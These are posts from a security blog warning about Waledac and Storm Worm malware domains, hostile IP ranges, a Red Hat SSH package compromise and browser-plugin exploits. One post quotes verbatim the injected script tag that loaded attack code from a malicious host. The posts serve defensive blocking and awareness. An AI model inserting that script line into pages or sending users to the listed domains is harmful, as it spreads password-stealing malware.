SecurityZone.org - Information Security Blog

Got the full list also being updated and posted on the Shadowserver website at the following URL:

http://www.shadowserver.org/wiki/uploads/Calendar/waledac_domains.txt

However, just wanted to reiterate to people that you should block all of these domains:

Registered January 23, 2009:

adorelyric.com
adorepoem.com
adoresongs.com
bestadore.com
bestlovelong.com
funloveonline.com
youradore.com
yourgreatlove.com

Registered January 19, 2009:

bestgoodnews.com
goodnewsdigital.com
goodnewsreview.com
linkworldnews.com
reportradio.com
spacemynews.com
wapcitynews.com
worldnewsdot.com
worldnewseye.com
worldtracknews.com

Registered January 15, 2009:

bestbarack.com
bestbaracksite.com
bestobamadirect.com
expowale.com
greatbarackguide.com
greatobamaguide.com
greatobamaonline.com
jobarack.com
superobamadirect.com
superobamaonline.com
thebaracksite.com
topwale.com
waledirekt.com
waleonline.com
waleprojekt.com

Older:

bestchristmascard.com
bestmirabella.com
bestyearcard.com
blackchristmascard.com
cardnewyear.com
cheapdecember.com
christmaslightsnow.com
decemberchristmas.com
directchristmasgift.com
eternalgreetingcard.com
freechristmassite.com
freechristmasworld.com
freedecember.com
funnychristmasguide.com
greatmirabellasite.com
greetingcardcalendar.com
greetingcardgarb.com
greetingguide.com
greetingsupersite.com
holidayxmas.com
itsfatherchristmas.com
justchristmasgift.com
lifegreetingcard.com
livechristmascard.com
livechristmasgift.com
mirabellaclub.com
mirabellamotors.com
mirabellanews.com
mirabellaonline.com
newlifeyearsite.com
newmediayearguide.com
newyearcardcompany.com
newyearcardfree.com
newyearcardonline.com
newyearcardservice.com
smartcardgreeting.com
superchristmasday.com
superchristmaslights.com
superyearcard.com
themirabelladirect.com
themirabellaguide.com
themirabellahome.com
topgreetingsite.com
whitewhitechristmas.com
worldgreetingcard.com
yourchristmaslights.com
yourdecember.com
yourmirabelladirect.com
yourregards.com
youryearcard.com

Waledac Exploit Domain List:

googol-analisys.com
seocom.name
seocom.mobi
seofon.net

—-

Also, if you are interested in all things Waledac (omghi2u!), check our Jeremy’s Waledac tracker here:

http://sudosecure.net/waledac/

Woops! It looks like multiple servers by the Red Hat and Fedora projects were compromised last week. It’s always unfortunate when this sort of stuff happens, especially when the hackers make modifications to the SSH packages. Fortunately the issue only affects a few versions of the packages and only existed for a short time. There have been various announcements and mailing list postings on this issue that can be viewed here and here.

Potential affected OS versions that may have received these updates:

Red Hat Desktop (v. 4)
Red Hat Enterprise Linux (v. 5 server)
Red Hat Enterprise Linux AS (v. 4)
Red Hat Enterprise Linux AS (v. 4.5.z)
Red Hat Enterprise Linux Desktop (v. 5 client)
Red Hat Enterprise Linux ES (v. 4)
Red Hat Enterprise Linux ES (v. 4.5.z)
Red Hat Enterprise Linux WS (v. 4)

You can grab the OpenSSH blacklist script from the Red Hat website by clicking here. This script can be run by a non-privileged users to check if the OS has any of the listed malicious packages.

It appears there are now Adobe Flash vulnerabilities live and in the wild on several sites. This is not good considering some of the websites involved in the recent mass SQL injection attacks are aiming to exploit this vulnerability. Basically, if you can’t recall upgrading flash recently, you probably need to go ahead and do it.

You can check your current flash version by clicking here.

You can upgrade to the latest version of flash by clicking here.

Don’t wait - just upgrade right now!

It appears that in addition to “supersameas.com”, the Storm Worm is now using and spamming itself out with several new domain names. These domain names are all with Chinese registrars and have been around since at least February but are just now starting to be used. In addition to serving up the executables for download, they are also attempting fire exploits at users that have the Internet Explorer browser. It is highly recommended that you do NOT visit these domains. Here is the list that is currently active:

biggetonething.cn
gasperoblue.cn
giftapplys.cn
gribontruck.cn
limpodrift.cn
loveinlive.cn
newoneforyou.cn
normocock.cn
orthelike.com
supersameas.com
thingforyoutoo.cn

They are coming through via e-mail as always and continuing their assault against Blogger (blogspot.com) sites. Searching Google shows the standard “love” related campaign. However, there is at least one result on Google showing politically motivated e-mails that are being sent as well. At least one Spam reported on the Google group “news.admin.net-abuse.sightings” shows an e-mail with the subject “Cowen confirmed as next Irish premier Options” and a body of “Police fire on protesters in Nepal” followed by a link to one of the above domains.

If you visit these sites with IE, you will quickly find yourself being attacked via different ActiveX objects. The first set of exploits will attempt to download “load.exe” to the system. It will then ultimately redirect the visitor to “flow.php” which is full of obfuscated JavaScript. It is recommended that you block the above domain names and do not visit them.

Hello all that find this page. I’d like to see if I could at least try and clear up some confusion for a few of you out there. There has been a lot of coverage over the last few days on two completely different attacks that some how end being linked together. We will look at both issues, describe them, and show how these attacks are not the same.

Chinese JavaScript Injection Attack

Over the past ten days or so, the following code has found its way into the actual source code of several thousand web pages:

<script src=http://www.2117966.net/fuckjp.js></script>

This JavaScript would attempt to do several things and load other files that would attempt to exploit the visitor. With this attack there are *NO* iframe tags involved. Just take a look at the above line of code and is exactly what was injected. This is almost indentical to the “uc8010.com” attacks a few months ago. In fact, we were able to find a few pages that appear to have had the line of code above injected right into the middle of where it used to refer to uc8010.com. In my opinion it looks very similar but seems to have different goals. In any event, if you get malware from the latest go around of these attacks, they will being stealing your passwords that you send with Internet Explorer.

An interesting side note worth mention is that Trend Micro’s own website was hit with this attack. They had several pages that can still be viewed in Google’s cache that were injected with the above script. It just goes to show this kind of unfortunate stuff can happen to anyone.

IFrame Injection Attack

The other attack that is getting a lot of attention is one that’s labeled an IFrame injection attack. However, in these instance the websites themselves are NOT actually hacked. Rather there is a lack of input validation and the attackers are able to cache search results involving links to malicious websites through an IFrame. In theory they could have just as easily put a JavaScript reference. It just happens they used an IFrame in their search terms that get cached. The websites themselves have not been compromised (i.e. if you just legitimately browsed on the website, you would not find yourself under attack). It appears some of them are attempting to exploit vulnerabilities in the user’s system and others are presenting them with fake errors about needing video codec. From what I have seen and what has been reported, the Zlob trojan is the target install for a lot or most of this stuff. You can read some more information and see examples of this at http://ddanchev.blogspot.com/.

Conclusion

As you can see, these are completely unrelated attacks. Other than the fact they involve the Internet and getting malware on a user’s system, there is really no other correlation. However, either group behind both attacks could easily use the techniques of the other, as could any other group. We have seen some interesting tricks from the bad guys lately. We’ll have to see what they come up with next.

Steven

There have been another round of websites being attacked and having malicious JavaScript links placed into them. This will cause visitors to legitimate websites have been hacked to attempt to load a malicious JavaScript file from a Chinese website. The website 2117966.net (125.46.105.224) should be blocked or monitored for where possible! Please do not visit this website. The JavaScript will load other files and make attempt to exploit several vulnerabilities and compromise the end user. If a compromise is successful a password stealer will be loaded on the system. The program will attempt to send keylogged data to another server in China at the IP address 61.188.39.175.

Please be a look out for these websites and IPs on your network. You can read the full blog and links to other sites reporting this issue at http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080313

Well, it looks like there might be good news regarding Abdallah_Internet Hizmetleri, a group that owned a few IP ranges on TurkTelekom. It appears they might no longer be operational. As of late last night or early today, all routes going to 88.255.90.0/24 and 88.255.94.0/24 appear to have gone dead. Part of the WHOIS record now reads as follows:

person: Mahmod AbdAllah el Gashmi
address: SISTEMNET TELEKOM BLACKLISTED PERSON
e-mail: admin@sistemnet.com.tr
phone: +902122666060
remarks: ——————————————————
remarks: SISTEMNET TELEKOM BLACKLISTED PERSON
remarks: For Abuse Contact : abuse@sistemnet.com.tr
remarks: SISTEMNET TELEKOM BLACKLISTED PERSON
remarks: SISTEMNET TELEKOM BLACKLISTED PERSON
remarks: ——————————————————

This is pretty good news as we have previously blogged about these IP ranges here. One of my Shadowserver colleagues also just recently published a whitepaper about AbdAllah Internet Hizmetleri. It would be awesome if this is what ultimately pulled the plug. You can read the whitepaper entitled “RBN Rizing” at whitepapers section on the Shadowserver website at whitepapers section or view it directly by going to RBN Rizing document itself. Happy reading and good riddance (?) to AbdAlllah_Internet!

Do a WHOIS on an IP address in 88.255.0.0/16 and you will get back something like this as part of your response:

% Information related to ‘88.255.0.0/16AS9121′

route: 88.255.0.0/16
descr: TurkTelekom
origin: AS9121
mnt-by: AS9121-MNT
source: RIPE # Filtered

Now not everything on 88.255.0.0/16 or AS9121 is evil. However, there are some ranges that are definitely pretty bad. We have been seeing a lot of malware out of some of these ranges for a while. Even some of the stuff that used to be housed on over on the main Russian Business Network IP ranges have moved here. Remember the Virut trojan that used “proxima.ircgalaxy.pl” as part of its operation and used to be on RBN IP space? Well, it’s now at 88.255.74.140.

Now let’s give you a list of some of the ranges you should be concerned about.

88.255.90.0/24
88.255.91.0/24
88.255.92.0/24
88.255.93.0/24
88.255.94.0/24
88.255.74.0/24

The first five IP ranges belong to AbdAllah Internet Hizmetleri (AbdAllah_Internet) and are particularly nasty. Some of the ranges are seen a lot more than others, but there’s a pretty consistent pattern what is housed here. All kinds of drive-by exploit sites are on these IP addresses. Most of them seem to be geared towards information theft. A number of Nethell, Pinch, and other infostealer/banker trojans are live on those IPs.

The sixth and last IP range above is listed under “AKSERVERS_INTERNET_HIZMETLERI”. No idea if these are some how related, but this subnet also has a lot of the same bad stuff. Consider blocking these ranges or monitoring what goes in and out to them from your networks.

In case you haven’t seen there has been a recently release vulnerability and exploit code for a vulnerability in Apple QuickTime 7.x (confirmed 7.3 and exploit code says 7.2 also). You can read details of the issue at http://www.kb.cert.org/vuls/id/659761. This first came to light 6 days ago and is currently unpatched. A steady stream of exploits have appeared on milw0rm that have modifed the exploit to continually support more operating systems and browsers. The latest release today now apparently works on Mac OS X. To make things even worse on Apple’s part is that there is a CVE from 2002 seemingly describing this exact issue in QuickTime 5.0.1 and 5.0.2.

Anyway, if you’ve got QuickTime installed be careful where you browse and be on the lookout for an update to patch this issue.